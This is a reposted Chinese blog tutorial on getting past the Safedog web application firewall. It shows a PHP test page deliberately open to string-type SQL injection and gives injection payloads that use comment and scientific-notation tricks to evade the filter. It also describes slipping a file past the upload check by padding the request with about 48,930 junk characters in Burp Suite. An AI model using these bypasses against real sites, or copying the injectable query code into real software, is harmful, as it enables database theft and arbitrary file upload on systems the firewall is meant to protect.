作者是谁不清楚,看到群里分享出来的,所以转载到博客了。—–收集整理 by: www.nvhack.com

d3127af4d742b0a51a7815a49a54dd4c.gif

安全狗SQL注入绕过 测试文件,明显的字符型 SQL 注入 <?php

header(“Content-type: text/html; charset=utf-8”); $link = mysql_connect(“localhost”,”root”,”root”); mysql_select_db(“test”,$link);

$sql = “select * from cms where id='{$_GET[‘id’]}'”; echo $sql;

echo ‘
—————————–
‘; $res = mysql_query($sql);

while ( $rows = mysql_fetch_array($res)) { echo $rows[0];

echo $rows[1]; echo $rows[2];

}

?> 正常运行界面

d3127af4d742b0a51a7815a49a54dd4c.gif 添加注入测试语句 http://localhost/waf123.php?id=3′ and 1=1 –+

d3127af4d742b0a51a7815a49a54dd4c.gif 修改测试语句 http://localhost/waf123.php?id=3’/*!and*/%202e1/**/=2e1–+

d3127af4d742b0a51a7815a49a54dd4c.gif

d3127af4d742b0a51a7815a49a54dd4c.gif

d3127af4d742b0a51a7815a49a54dd4c.gif

安全狗上传绕过 附上 php 上传脚本源码,此源码未对上传文件类型做校验

d3127af4d742b0a51a7815a49a54dd4c.gif

d3127af4d742b0a51a7815a49a54dd4c.gif 绕过方法,工具:burpsuite 1,用 php 脚本或者 js,python 等其他语言,生成 48930 个字符 <?php

for ($i=0; $i <= 48930; $i++) { echo ‘o’;

}

?> 抓包,改包

d3127af4d742b0a51a7815a49a54dd4c.gif 添加后如图

d3127af4d742b0a51a7815a49a54dd4c.gif 查看当前目录,上传成功 1

d3127af4d742b0a51a7815a49a54dd4c.gif


版权声明:本文为weixin_32871457原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
原文链接:https://blog.csdn.net/weixin_32871457/article/details/113419549